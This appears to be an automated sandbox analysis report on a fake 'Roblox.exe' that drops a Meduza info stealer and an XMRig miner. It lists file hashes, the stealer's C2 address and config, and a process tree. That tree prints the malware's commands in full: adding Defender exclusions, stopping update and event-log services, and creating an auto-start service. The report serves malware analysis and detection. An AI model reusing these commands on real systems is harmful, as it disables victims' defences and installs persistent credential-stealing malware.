Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 19:11

General

  • Target

    Roblox.exe

  • Size

    649.7MB

  • MD5

    4ccbe16c40cc36f2b845f6aaef1ba4cb

  • SHA1

    4ee86cb4045ab514b25af0b7a81092d3a9c49242

  • SHA256

    9f6b4e433a721a96b742e150031e57901fcd6f98cab714255d9bb72e0648a350

  • SHA512

    cc1b1a8be443e00a6e8d779318042d24cf5a81e619b0f14edf7d673228e8e517b480513f452dd843fe86b4ba98ff6bd53f8f19c363854035184227f5a6995c76

  • SSDEEP

    98304:b57FKBSfaYFYL8AnEOp0NTbeLvam4w0nY:Z8ofp8EOp0NTSvam4wQY

Malware Config

Extracted

Family

meduza

C2

45.130.145.152

Attributes
  • anti_dbg

    true

  • anti_vm

    true

  • build_name

    Work

  • extensions

    .txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite

  • grabber_max_size

    4.194304e+06

  • port

    15666

  • self_destruct

    false

Signatures

  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

  • Meduza Stealer payload 2 IoCs
  • Meduza family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 7 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Roblox.exe
    "C:\Users\Admin\AppData\Local\Temp\Roblox.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Users\Admin\AppData\Local\Temp\birdflower.exe
      "C:\Users\Admin\AppData\Local\Temp\birdflower.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:3060
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1840
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          • Drops file in Windows directory
          PID:1500
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:3032
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:2036
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        3⤵
        • Launches sc.exe
        PID:2768
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        3⤵
        • Launches sc.exe
        PID:532
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        3⤵
        • Launches sc.exe
        PID:1940
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        3⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2160
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        3⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        3⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2472
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        3⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2040
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "LBFXRZGB"
        3⤵
        • Launches sc.exe
        PID:2032
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto"
        3⤵
        • Launches sc.exe
        PID:2288
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        3⤵
        • Launches sc.exe
        PID:2392
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "LBFXRZGB"
        3⤵
        • Launches sc.exe
        PID:2060
    • C:\Users\Admin\AppData\Local\Temp\revcon.exe
      "C:\Users\Admin\AppData\Local\Temp\revcon.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2736 -s 616
        3⤵
        • Loads dropped DLL
        PID:2708
  • C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
    C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2168
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Drops file in Windows directory
        PID:3016
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:2260
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:1880
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:2248
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:992
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:1332
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2156
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:860
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:1328
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:868
    • C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe
      2⤵
        PID:3036
      • C:\Windows\system32\svchost.exe
        svchost.exe
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2388

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\birdflower.exe

      Filesize

      5.0MB

      MD5

      769ea3d0e0cf22eaa7526a89c0f438cf

      SHA1

      5221042ad60744e2bdcf8319ff00bdbfc253eb59

      SHA256

      b369c94a835882a2267ff0a7a4ebb9a91621c3f134f63010d491121a7827b448

      SHA512

      d50130430911f16f4d2f7e4d3552f51ceb74601eda13cfbc374c9327e11d7865bdfc49803b54cf7b595b89996db28d3173d7a22993e968fd9a1a080c6b434c9a

    • C:\Users\Admin\AppData\Local\Temp\revcon.exe

      Filesize

      3.2MB

      MD5

      1f453ea0b228aaa80fc1b49de8209816

      SHA1

      62299a245f28ec9cf2a902b79b2af4aa76ca3ef5

      SHA256

      576f4f144c08fdbfbb44e7d679d26ab8b1526b58a781625deb095a4ba9f2105f

      SHA512

      fdbb42caef70e8ec84e0ede91e86ef209fd413c2f01eacba72bd128433a27d9234fbee940f87f1d3726cb4e6a0a0737f99a835787ebf44e2b66d75c6f34c6c94

    • memory/1240-30-0x00000000027A0000-0x00000000027A8000-memory.dmp

      Filesize

      32KB

    • memory/1240-29-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2168-37-0x0000000000950000-0x0000000000958000-memory.dmp

      Filesize

      32KB

    • memory/2168-36-0x0000000019EE0000-0x000000001A1C2000-memory.dmp

      Filesize

      2.9MB

    • memory/2388-60-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-50-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-49-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-48-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-61-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-59-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-47-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-53-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-55-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-52-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-58-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-51-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-57-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-56-0x0000000140000000-0x0000000140848000-memory.dmp

      Filesize

      8.3MB

    • memory/2388-54-0x0000000000040000-0x0000000000060000-memory.dmp

      Filesize

      128KB

    • memory/2404-1-0x00000000008D0000-0x00000000018D0000-memory.dmp

      Filesize

      16.0MB

    • memory/2404-3-0x000007FEF5B73000-0x000007FEF5B74000-memory.dmp

      Filesize

      4KB

    • memory/2404-5-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

      Filesize

      9.9MB

    • memory/2404-6-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

      Filesize

      9.9MB

    • memory/2404-4-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

      Filesize

      9.9MB

    • memory/2404-2-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

      Filesize

      9.9MB

    • memory/2404-0-0x000007FEF5B73000-0x000007FEF5B74000-memory.dmp

      Filesize

      4KB

    • memory/2736-20-0x0000000001C00000-0x0000000001D3E000-memory.dmp

      Filesize

      1.2MB

    • memory/2736-24-0x0000000001C00000-0x0000000001D3E000-memory.dmp

      Filesize

      1.2MB

    • memory/3036-38-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/3036-39-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/3036-40-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/3036-41-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/3036-45-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/3036-42-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB